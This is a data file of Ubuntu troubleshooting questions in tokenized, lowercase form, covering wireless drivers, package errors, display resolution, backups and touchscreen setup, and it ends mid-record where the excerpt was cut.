330319	view gpu processor activity in real time ?	i wanted to know if there is such a terminal command or application that allows one to view the progress of the processes running on the gpu in real time . basically , something like 'top ' for the gpu . i am running ubuntu 13.04 on a toshiba satellite with an intel 4000 graphic card and i look forward to parallelize some computations with pyopencl . so i want to be able to monitor the processes of a gpu at real time . is this gpu-brand-dependent ? do only gpu vendors provide such a utility or is there a general command one can easily execute ? thanks !
330325	ndiswrapper reporting that wireless driver is working but no wireless connection option	i just got ndiswrapper to work without returning an error , i installed the driver for my device that i found here : http : //sourceforge.net/apps/mediawiki/ndiswrapper/index.php ? title=buffalotech_wli2-pci-g54 and when i run ndiswrapper -l i get this : josh @ josh-desktop : ~ $ ndiswrapper -l net2pg54 : driver installed device ( 14e4:4320 ) present ( alternate driver : ssb ) so it 's saying that it sees the device and that its , present , but its not showing up in my connections . what else do i have to do ? i feel like i 'm missing something .
330326	running git status resets permissions on index file	trying to sort out if this is a git bug or something with ubuntu . basically about half the time an interaction with the git index file results in the permissions on that file being changed to the point that i ca n't do the same command again . like so : $ ll .git total 156k ... drwxrwxrwx 2 dev dev 4.0k jul 23 09:30 hooks -rwxrwxrwx 1 dev dev 17k aug 8 13:12 index drwxrwxrwx 2 dev dev 4.0k jul 19 09:31 info ... $ gs # on branch build-0.3 # your branch is ahead of 'staging/build-0.3 ' by 5 commits . # ( use `` git push '' to publish your local commits ) # # untracked files : # ( use `` git add < file > ... '' to include in what will be committed ) # # scripts/loaddb.coffee nothing added to commit but untracked files present ( use `` git add '' to track ) $ ll .git total 156k ... drwxrwxrwx 2 dev dev 4.0k jul 23 09:30 hooks -rw-rw-r -- 1 dev dev 17k aug 8 13:16 index # < -- -- -- this line drwxrwxrwx 2 dev dev 4.0k jul 19 09:31 info ... $ git -- version git version 1.8.3.4 $ lsb_release -a distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise i 've submitted a bug report to the git mailing list , but that list is so user-unfriendly that i ca n't tell if it 's actually been submitted . it 's also possible that i 've done something wrong in ubuntu and that 's what is causing it . this has only been happening since i switched over to 12.04 64b but i ca n't say with certainty that that is exactly when it happened .
330327	screen turns off while watching video ( vlc player & sm player )	i 'm on ubuntu 12.04 and i 've already read similar questions and answers regarding this issue but none of them reported the same problem as i have . the problem is that the screen turns off after 10 minutes while i watch a movie . no matter which player i use ( vlc or sm ) , it still happens . it used to log me out too , but i changed the default setting as follows after changing the setting , it does n't log out automatically but it still turns off the screen . it seems like , system simply ignores the video players activities . how to solve this one ( bug ) ?
330329	robotux tray icon does n't show up	when i start robotux on lubuntu 13.04 , i get the notification that it has started , and the icon does n't appear . does any1 have a solution for this ?
330330	how to create a bootable usb of ubuntu from a lubuntu system	i am using lubuntu 12.04 on my pc . i want to install ubuntu 12.04 on my laptop . how do i create a bootable usb on lubuntu so that i can install ubuntu os to my laptop ?
330331	wireless connection is fast , but then it goes down to 0 kb/s download	i 've recently installed ubuntu 12.04 on my desktop . everything works fine , i can see wireless networks and connect to them . but , sometimes ( this is quite often ) , my internet speed goes from 2-3 mb/s download speed ( on steam ) to 0 in 10-20 seconds . then it goes back to normal . this also often happends in firefox , where i can be surfing around the internet , and it 's working just fine . then it just suddenly ca n't load any web-pages - and i 'm in both cases still connected to the wireless net ! my desktop has the following specs : wireless network-card : asus pce-n15 ram : 8gb kingston ram . gpu : gtx 670 cpu : intel i5 3570 harddisk : 500gb . ubuntu 12.04 full installation , installed after windows 7 home premium 64-bit . ubuntu is also 64-bit . but , it 's quite odd . my download rate in ubuntu is about 1-2 mb/s faster than in windows 7 ( same computer ) , but in ubuntu it just sometimes goes to 0 . i have disabled ipv6 , wich actually made the internet become much faster and more stable ( it is less likely to reach 0 . ) anyone have any idea about how to solve this ? thanks ! update : after i finished downloading from steam , i 've got no connection . i 've rebooted the computer , but the internet is really slow now ! ( about 1/10 of normal ) . lspci -nnk | grep -ia2 net : 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8178 ] ( rev 01 ) subsystem : asustek computer inc. device [ 1043:84b6 ] kernel driver in use : rtl8192ce -- 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 09 ) subsystem : asustek computer inc. device [ 1043:8505 ] kernel driver in use : r8169 lsusb : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 1532:001c razer usa , ltd rz01-0036 optical gaming mouse [ abyssus ] bus 001 device 004 : id 1532:010b razer usa , ltd nm-tool : networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : 08:60:6e : e6:3c:57 capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 [ vokal97kanel58liter ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : rtl8192ce state : connected default : yes hw address : 50:46:5d : ae:18 : a6 capabilities : speed : 144 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *vokal97kanel58liter : infra , 00:26:24:78 : d5:36 , freq 2417 mhz , rate 54 mb/s , strength 73 wpa2 stund86motto37kahyt : infra , e8:40 : f2:6b : f2:0f , freq 2442 mhz , rate 54 mb/s , strength 89 wep amab : infra , 30:46:9a:1b:4b:59 , freq 2417 mhz , rate 54 mb/s , strength 87 wpa2 tdc-9bdc : infra , 00:19:70:75:73:75 , freq 2452 mhz , rate 54 mb/s , strength 87 wpa wpa2 skole63video51meter : infra , 00:26:24:3f:4b:12 , freq 2442 mhz , rate 54 mb/s , strength 87 wpa2 ipv4 settings : address : 192.168.87.114 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.87.1 dns : 212.10.10.4 sudo iwlist scan : eth0 interface does n't support scanning . lo interface does n't support scanning . wlan0 scan completed : cell 01 - address : 00:26:24:78 : d5:36 channel:2 frequency:2.417 ghz ( channel 2 ) quality=63/70 signal level=-47 dbm encryption key : on essid : '' vokal97kanel58liter '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=00000000bd61ad42 extra : last beacon : 60ms ago ie : unknown : 0013766f6b616c39376b616e656c35386c69746572 ie : unknown : 010882848b962430486c ie : unknown : 030102 ie : unknown : 2a0104 ie : unknown : 2f0104 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1afc181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1602080400000000000000000000000000000000000000 ie : unknown : dd090010180202f02c0000 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 iwconfig : eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' vokal97kanel58liter '' mode : managed frequency:2.417 ghz access point : 00:26:24:78 : d5:36 bit rate=144.4 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=68/70 signal level=-42 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:82 missed beacon:0 rfkill list all : 0 : phy0 : wireless lan soft blocked : no hard blocked : no update 2 : it 's somehow a bit more stable now . but i can only get 1-2 mb download rate in a speed test , but in windows i get about 30 mb .
330333	package extlinux only partially installed , causing package installation and apt update problems	i 've been running 12.04 x64 lts desktop for about a year with no issues , but recently i 've done something - no idea what - that that appears to have resulted in a broken or partially installed extlinux package . now most of the apt installs or daily updates i run either fail or partially fail , with errors similar to below . i 've tried apt-get clean , apt-get autoclean , using the aptitude ncurses interface to find broken packages ( no results ) and to complete the installation of partially-installed extlinux ( fails with the error below ) , no luck . anyone know what might be the problem and how to fix it ? $ > aptitude ( reading database ... 681145 files and directories currently installed . ) removing libio-pty-perl ... removing libllvm3.0 : i386 ... removing linux-headers-3.2.0-31-generic ... removing linux-headers-3.2.0-31 ... removing sdparm ... removing ttf-umefont ... removing ttf-unfonts-core ... removing wine-gecko1.7 ... removing wine-gecko1.7 : i386 ... removing wine-mono0.0.4 ... processing triggers for man-db ... processing triggers for libc-bin ... ldconfig deferred processing now taking place setting up extlinux ( 2:4.05+dfsg-2 ) ... p : checking for extlinux directory ... found . p : writing config for /boot/vmlinuz-3.2.0-51-generic ... p : writing config for /boot/vmlinuz-3.2.0-49-generic ... p : writing config for /boot/vmlinuz-3.2.0-48-generic ... p : writing config for /boot/vmlinuz-3.2.0-45-generic ... p : writing config for /boot/vmlinuz-3.2.0-44-generic ... p : writing config for /boot/vmlinuz-3.2.0-43-generic ... p : writing config for /boot/vmlinuz-3.2.0-41-generic ... p : writing config for /boot/vmlinuz-3.2.0-40-generic ... p : writing config for /boot/vmlinuz-3.2.0-39-generic ... p : writing config for /boot/vmlinuz-3.2.0-38-generic ... p : writing config for /boot/vmlinuz-3.2.0-37-generic ... p : writing config for /boot/vmlinuz-3.2.0-36-generic ... p : writing config for /boot/vmlinuz-3.2.0-35-generic ... p : writing config for /boot/vmlinuz-3.2.0-34-generic ... p : writing config for /boot/vmlinuz-3.2.0-33-generic ... p : writing config for /boot/vmlinuz-3.2.0-32-generic ... p : writing config for /boot/vmlinuz-3.2.0-31-generic ... p : writing config for windows 7 ( loader ) on /dev/sda1 ... p : writing config for windows recovery environment ( loader ) on /dev/sda2 ... p : installing debian theme ... cp : can not stat `/usr/share/syslinux/themes/debian-squeeze/extlinux/memtest.bin ' : no such file or directory dpkg : error processing extlinux ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : extlinux e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up extlinux ( 2:4.05+dfsg-2 ) ... p : checking for extlinux directory ... found . p : writing config for /boot/vmlinuz-3.2.0-51-generic ... p : writing config for /boot/vmlinuz-3.2.0-49-generic ... p : writing config for /boot/vmlinuz-3.2.0-48-generic ... p : writing config for /boot/vmlinuz-3.2.0-45-generic ... p : writing config for /boot/vmlinuz-3.2.0-44-generic ... p : writing config for /boot/vmlinuz-3.2.0-43-generic ... p : writing config for /boot/vmlinuz-3.2.0-41-generic ... p : writing config for /boot/vmlinuz-3.2.0-40-generic ... p : writing config for /boot/vmlinuz-3.2.0-39-generic ... p : writing config for /boot/vmlinuz-3.2.0-38-generic ... p : writing config for /boot/vmlinuz-3.2.0-37-generic ... p : writing config for /boot/vmlinuz-3.2.0-36-generic ... p : writing config for /boot/vmlinuz-3.2.0-35-generic ... p : writing config for /boot/vmlinuz-3.2.0-34-generic ... p : writing config for /boot/vmlinuz-3.2.0-33-generic ... p : writing config for /boot/vmlinuz-3.2.0-32-generic ... p : writing config for /boot/vmlinuz-3.2.0-31-generic ... p : writing config for windows 7 ( loader ) on /dev/sda1 ... p : writing config for windows recovery environment ( loader ) on /dev/sda2 ... p : installing debian theme ... cp : can not stat `/usr/share/syslinux/themes/debian-squeeze/extlinux/memtest.bin ' : no such file or directory dpkg : error processing extlinux ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : extlinux press return to continue .
330337	do i have to use thunderbird to get email notifications ?	i use gmail and i would like to get a notification every time i receive an email . however , it seems that i have to use thunderbird in order to get the notifications . is this correct , or are there other possibility to set things up in order to be warned when i receive a new email ?
330348	springseed not working after update	after checking other questions , i 've found this error with the newest version of springseed . i have followed other questions/answers but this problems seems to be different . here is what i get after running springseed from terminal . /opt/springseed/springseed-bin /opt/springseed/nw : error while loading shared libraries : libudev.so.0 : can not open shared object file : no such file or directory i have the newest udev installed , so the error is strange . i work on ubuntu 13.04 . i have tried to change springseed.desktop as in other posts . no results other than this libudev error .
330353	improve world of warcraft in wine ? ( gtx 660 )	before you say anything , i know i 'm not going to get the same performance under wine as in windows . now , i 've been getting really poor performace with running wow : mists of pandaria , and it 's not just 10 or 20 fps less , it 's literally around 100-200 fps or more . i 've tried running it with d3d and opengl , and the only difference is d3d has a lot higher options for some reason . when running in windows i get about 80 fps with all performance settings maximized / set to the highest value possible . when running in wine i get about crash / 30-60 fps on the absolute lowest settings . here 's all the pc info : motherboard : gigabyte 970a-ud3 gfx : zotac gtx 660 cpu : amd fx 6300 3.5ghz ssd : samsung 840 120gb psu : corsair cx 600m ram : corsair vengeance 8gb driver : nvidia-310 wine : 1.4
330354	ubuntu 13.04 and issues with gnome shell 3.8	please suggest a very safe way to upgrade gnome to version 3.8.1 in ubuntu 13.04 x86_64 . i used gnome3 ppa , both stable and staging , did sudo update and sudo dist-upgrade , but finally found my unity de ( which i use by default in an administrator account ) , continuously crased and apport was starting in very small time gap . now that i am in no mood of beta testing right now , still getting news like `` upgrade gnome to 3.8 on raring ringtail '' ( fc 19 is already using it ) , is there a safe , step-by-step error-free method to upgrade gnome shell ? any comprehensive help will be appreciated . system : dell inspiron core i3 processor , dual-booted with win 7 64 bit .
330355	how to set helper apps in firefox and thunderbird	in both firefox and thunderbird , when you want to open a document in something other than the default registered in the program , they open a file picker . now in windows i know exactly what to do with this . i navigate to the program in c : /program files/ and look for the .exe file . what do i do in ubuntu ? for example , i want to set libreoffice as my default . yes , it ships as the default but thanks to canonical i uninstalled it and manually reinstalled it to get rid of that disgusting global menu . my system knows that libreoffice is the default app to open these files , but now i no longer have .docx and .xlsx files opening appropriately from the mozilla programs . i must download them all to open them . obviously i ca n't use the windows based file picker on a linux system . or do i ? where do i navigate to ? how do i get the mozilla programs to change the helper apps on ubuntu ? ubuntu 13.04 .
330356	is it bad to have /home/ on an ntfs partition ?	on my new computer , i did n't want to have /home on the system ssd but rather on the secondary drive which is a conventional hard drive . i followed these instructions for moving /home to the other disk : a : move home folder to second drive ( actually these specific steps ) but now i realize that the disk is ntfs format . will running home from ntfs be a problem , or perhaps a performance killer ? can i convert the hdd from ntfs to ext3 ( or ext4 ? ! ) without losing all the files , and how ?
330358	how to restore filesystem-backup made by rsync ?	running version 12.04 , with virtualmin/webmin . i tried to remove all unnecessary linux-image files today , since the /boot partition was full . i followed a guide from ask ubuntu , but that resulted in a broken grub , or something , probably because the command in the suggested guide removed more than it should have . after several hours i finally managed to install a new kernel image , and created a new grub , but then i found out that all files in the directory /run were deleted and probably several other files/directories , that were related to those packages in that directory . i do n't know how that could 've happened , but i knew there was something strange already when i booted into the recovery mode , since i could n't find any link to the symlink /etc/resolv.conf -- > /run/resolvconf/resolv.conf . anyway : i have a complete backup of my filesystem , that was made today with the rsync command ( sudo rsync -ahe ssh ... , options : -- delete -- exclude=.gvfs -- exclude=/proc -- exclude=/dev -- exclude=/sys ) . i tried to restore just the /run directory , without any luck . my question is then : can i just replace all files on my server , with the files on my backup-location , with the same rsync command ? ( yes , i know i have to swap `` source '' and `` destination '' in the command ) in case that it is possible , is there anything else i should do afterwards ?
330365	restrict auth user to ~/public_html	i have been searching for a solution in days now , and i can not find it . and please understand that i have only been using linux ( ubuntu ) for the last two weeks . i am using apache with mod pwauth and userdir , and simply want to restrict the auth user > to the home folder without creating location-tags in my httpd config file . if i understand correctly www-data is the group that apache is using to access the files and folders . and the username that the user used to login with , has nothing to do with the files and folders when user is logged in ( besides from the httpd file ) . what i mean is : user wants to access http : //myhost.com/~user apache is looking into the config file , sees that the user is valid and can access folder checking if user have access to folder via group www-data in the folder : ~/public_html` if ok user have access to the folder am i right , or have i completely misunderstood the auth process ? i mean . there must be some way to keep the auth user info and use it for the file permissions , so that apache is using them on the inside of the file system . update : i chosed to use another solution instead . i use openssh on the server side , and changed the protocol to sftp on the client side . now everything works very good . the administration is also much easier now .
330366	mouse stuttering in ubuntu 13.04	i 've been using ubuntu for a while now , and for some reason everytime i drag an object around or move my mouse , it stutters and for a milisecond does n't respond , so dragging becomes really hard , and gaming .
330372	i need to set resolution to 1600x900	on displays i only have 1366x768 , but i need 1600x900 . i 've installed the nvidia drivers , but still nothing . i 've tried using the xrandr -- newmode `` 1600x900 '' , but that does n't work . how can i set the resolution to 1600x900 ?
330374	disable keybindings in byobu using tmux backend	i 've setup the alt + arrow keys bindings for changing tab in vim ( in .vimrc ) : map < silent > < a-right > : tabnext < cr > map < silent > < a-left > : tabprevious < cr > this however does not work under byobu with tmux backend , i guess because it is remapped by byobu . i tried setting : unbind -n m-right unbind -n m-left in .tmux.conf or .byobu/keybindings.tmux without success . anyone has a suggestion on how to fix it ?
330375	where can i find the feature `` save to ubuntu one '' ?	i hope anyone remembers that ubuntuone introduced some years ago a feature which allows to integrate a button into a website to directly load files into the visitors ubuntuone . u1 had set up a demo at this time where it was possible to have sent some music files to my u1 . but i ca n't remember where this was , and after searching the web for a long time , i almost believe i am hallucinating - and this feature never existed . is this feature no longer available ? why ca n't i find information about it on the web anymore . maybe i just had a dream ?
330376	ubuntu touch/phone nexus 4 - 'no data sources available '	brand new nexus 4 , purchased to install and test out ubuntu touch os . successfully flashed the image through adb and following the official instructions here : https : //wiki.ubuntu.com/touch/install ubuntu boots on the nexus 4 without problems and can connect to wifi , can be accessed via ssh as well , but on the phone 's home/splash screen i have the message in the centre of the circle of dots saying : '' no data sources available '' so , i 'm guessing i have missed a crucial step but i ca n't see it . could anyone fill me in on what i need to do to get this baby up and running ? and following that , how do i get software onto it ? thanks for your time !
330377	where did the ubuntu touch files for the galaxy nexus toro go ?	i may have missed something but the only link i found no longer has the ubuntu touch files for the galaxy nexus toro . could anyone give me a link to where i can download the .zip files for this version please ?
330382	netflix desktop help in 12.04 lts	i recently tried opening my netflix desktop app and it just said `` compositing is not available , please enable compositing support and relaunch netflix desktop '' . what does this mean and how can i fix it ? thank you !
330384	how to launch the gui only sometimes on ubuntu 12.04 server ?	i just installed ubuntu server 12.04 and would like a gui based interface , but only when i need it . i want to be able to launch the desktop when i 'm trying to configure stuff ( and ca n't use the command line ) , then reboot and not have it appear unless i tell it too to reduce the required resources during normal server operation . is there any way to do that ?
330385	how to get a password back ?	i disabled my user password , then wanted to get a password back on , but ubuntu 12.10 would not let me . it wants me to enter a previous password , but there is no previous password . any ideas of what to do ?
330388	is ubuntu mobile easily customizable ?	i want to know if ubuntu mobile can be modified such as with different icons , menus bars and tweaks that change the way it might came from the factory and make it more `` mine '' , like this cinnamon elune theme , ( i know this is n't exactly ubuntu 's interface , but if we cool customize it ) . i say this because on android you are able to change the theme and other things by sometimes having to root and or change the rom , but on ubuntu mobile could you do it more easily ?
330391	32 bit server cd fails with package corrupt	why does the cd check out but the base install says its corrupt ? i downloaded it twice and burned 3 different disks
330393	bandwidth monitor	new to ubuntu , i want a application which monitor my bandwidth usage in gui for particular time . is any application is available for my requirement ? for ex : if i need to monitor for a month at a specific time 10 to 6 . please share your views .
330398	missing compact view in files	the files application used to have 3 buttons for icons , list and compact view . i used to use the shortcuts ctrl+1 , ctrl+2 and ctrl+3 often to switch between them . now there are only two buttons for list and icons , the preferences show only list and icons as possible default views , and the menu does n't show any of the options ( visible on this post ) . i think the change happened a few weeks ago , perhaps with an automatic update . is it normal ? or do i need to fix something ?
330400	ubuntu software center not responding	whenever i try to open ubuntu software center , it closes automatically within a few seconds . when i try to run an update from the command prompt this happens : anujsharma @ anuj-sharma : ~ $ sudo apt-get update e : malformed line 59 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . the line 59 in source list /etc/apt/sources.list is : deb http : //archive.canonical.com/ $ ( lsb_release-sc ) partenr my sources.list file is as follows : # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //in.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //in.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //in.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //in.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //in.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //in.archive.ubuntu.com/ubuntu/ precise universe deb http : //in.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //in.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //in.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //in.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //in.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb http : //archive.canonical.com/ $ ( lsb_release-sc ) partenr deb-src http : //archive.canonical.com/ $ ( lsb_release-sc ) partenr deb-src http : //extras.ubuntu.com/ubuntu precise main now it is very frustrating to me . please help me to get rid of this error . i am not even able to install anything or even update either from the terminal , update manager or even from the ubuntu software center .
330407	how to save boot log from failed boot ?	i know i can run dmesg to look at boot errors . however , my system is failing to boot right now . it hangs indefinitely while trying to initialize hard drives . however , i can boot up into safe mode . when i boot up in safe mode and look at dmesg it does not contain old boot messages . it just contains the boot messages from the current boot-up into safe mode . how do i save the dmesg log ( or any log for that matter ) during the failed boot process so that i can view it when i log in to diagnose via save mode ?
330409	some modules does n't load on boot up	i have tried to build my custom installation of ubuntu using ubuntu-core . all work the way i wanted except some modules for my devices like my touchpad and wireless does n't load automatically , so i have to load them manually using modprobe command . why does this happend
330411	why does a forced shutdown help ubuntu recognize a module instead of normal shutdown ?	os : ubuntu 12.04 lts . kernel 3.5.0-37-generic laptop : hp mini 110 - 1100 module : hp 2400 mobile broadband i installed gobi-loader and copied two firmware files to /lib/firmware/gobi/ sometimes everything works : lguest-btxwzr @ xxii-minilap : ~ $ lsusb bus 001 device 002 : id 174f:110b syntek bus 001 device 004 : id 03f0:1f1d hewlett-packard un2400 gobi wireless modem bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub sometimes it does n't . after normal shutdown or reboot of ubuntu , even after many times setting up in terminal by google resources i have found : lguest-btxwzr @ xxii-minilap : ~ $ lsusb bus 001 device 002 : id 174f:110b syntek bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub after missing kind like that , i have found out the only way to bring the module back to work is a forced shutdown by keeping the hardware shutdown button . why is that happening on ubuntu ? is there a way to make ubuntu always recognize this module without missing it again ? does the forced shutdown harming my ubuntu installation ? now i know why the mobile broadband module sometimes misses on ubuntu . it is because i used the hardware power switcher to restart/shutdown . so i also find out restart/shutdown is different between using manual way and switcher way . do not touch this switcher , the problem will never happens .
330413	configure atmel maxtouch digitizer on samsung ativ 6	i am trying to figure out how to configure the touch screen for my samsung ativ 6 . i am running kubuntu 13.04 . it is an amtel maxtouch digitzer . it recognizes touch , but it only single clicks . also , when i have my external monitor attached , it thinks the touch screen spans the both screens . i found many things that were directed for wacom touchscreens , but nothing for the amtel . i 'm very new to linux , and am not even sure where to start looking beyond failed google searches . i found this result , but i do n't have the files this one mentions . here is the output of xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:200a id=10 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:1028 id=11 [ slave pointer ( 2 ) ] ⎜ ↳ atmel atmel maxtouch digitizer id=13 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=15 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ webcam sc-10hdp12631n id=12 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=14 [ slave keyboard ( 3 ) ] update 11 aug 2013 : i do want to clarify , my biggest question is how to get the touch screen to work correctly with and external monitor attached . if i touch the right side of the touch screen , the cursor thinks i am actually touching the external monitor . i mainly want to know how to make the system know the touch screen is n't stretched to the external monitor when it is plugged in . this is the output to the commands requested below : lsinput /dev/input/event0 bustype : bus_host vendor : 0x0 product : 0x5 version : 0 name : `` lid switch '' phys : `` pnp0c0d/button/input0 '' bits ev : ev_syn ev_sw /dev/input/event1 bustype : bus_host vendor : 0x0 product : 0x1 version : 0 name : `` power button '' phys : `` pnp0c0c/button/input0 '' bits ev : ev_syn ev_key /dev/input/event2 bustype : bus_host vendor : 0x0 product : 0x1 version : 0 name : `` power button '' phys : `` lnxpwrbn/button/input0 '' bits ev : ev_syn ev_key /dev/input/event3 bustype : bus_i8042 vendor : 0x1 product : 0x1 version : 43841 name : `` at translated set 2 keyboard '' phys : `` isa0060/serio0/input0 '' bits ev : ev_syn ev_key ev_msc ev_led ev_rep /dev/input/event4 bustype : bus_usb vendor : 0x46d product : 0xc52b version : 273 name : `` logitech unifying device . wirele '' phys : `` usb-0000:00:1a.0-1.2:2 '' uniq : `` '' bits ev : ev_syn ev_key ev_rel ev_abs ev_msc ev_led ev_rep /dev/input/event5 bustype : bus_usb vendor : 0x46d product : 0xc52b version : 273 name : `` logitech unifying device . wirele '' phys : `` usb-0000:00:1a.0-1.2:3 '' uniq : `` '' bits ev : ev_syn ev_key ev_rel ev_msc /dev/input/event6 bustype : bus_host vendor : 0x0 product : 0x6 version : 0 name : `` video bus '' phys : `` lnxvideo/video/input0 '' bits ev : ev_syn ev_key /dev/input/event7 bustype : bus_host vendor : 0x0 product : 0x6 version : 0 name : `` video bus '' phys : `` lnxvideo/video/input0 '' bits ev : ev_syn ev_key /dev/input/event8 bustype : bus_usb vendor : 0x3eb product : 0x8816 version : 273 name : `` atmel atmel maxtouch digitizer '' phys : `` usb-0000:00:1a.0-1.5/input0 '' uniq : `` '' bits ev : ev_syn ev_key ev_abs /dev/input/event9 bustype : ( null ) vendor : 0x0 product : 0x0 version : 0 name : `` hda intel pch hdmi/dp , pcm=3 '' phys : `` alsa '' bits ev : ev_syn ev_sw /dev/input/event10 bustype : ( null ) vendor : 0x0 product : 0x0 version : 0 name : `` hda intel pch mic '' phys : `` alsa '' bits ev : ev_syn ev_sw /dev/input/event11 bustype : ( null ) vendor : 0x0 product : 0x0 version : 0 name : `` hda intel pch headphone '' phys : `` alsa '' bits ev : ev_syn ev_sw /dev/input/event12 bustype : bus_i8042 vendor : 0x2 product : 0xe version : 0 name : `` etps/2 elantech touchpad '' phys : `` isa0060/serio1/input0 '' bits ev : ev_syn ev_key ev_abs /dev/input/event13 bustype : bus_usb vendor : 0x2232 product : 0x1045 version : 89 name : `` webcam sc-10hdp12631n '' phys : `` usb-0000:00:1a.0-1.4/button '' bits ev : ev_syn ev_key evtest /dev/input/event8 input driver version is 1.0.1 input device id : bus 0x3 vendor 0x3eb product 0x8816 version 0x111 input device name : `` atmel atmel maxtouch digitizer '' supported events : event type 0 ( ev_syn ) event type 1 ( ev_key ) event code 330 ( btn_touch ) event type 3 ( ev_abs ) event code 0 ( abs_x ) value 3355 min 0 max 4095 resolution 12 event code 1 ( 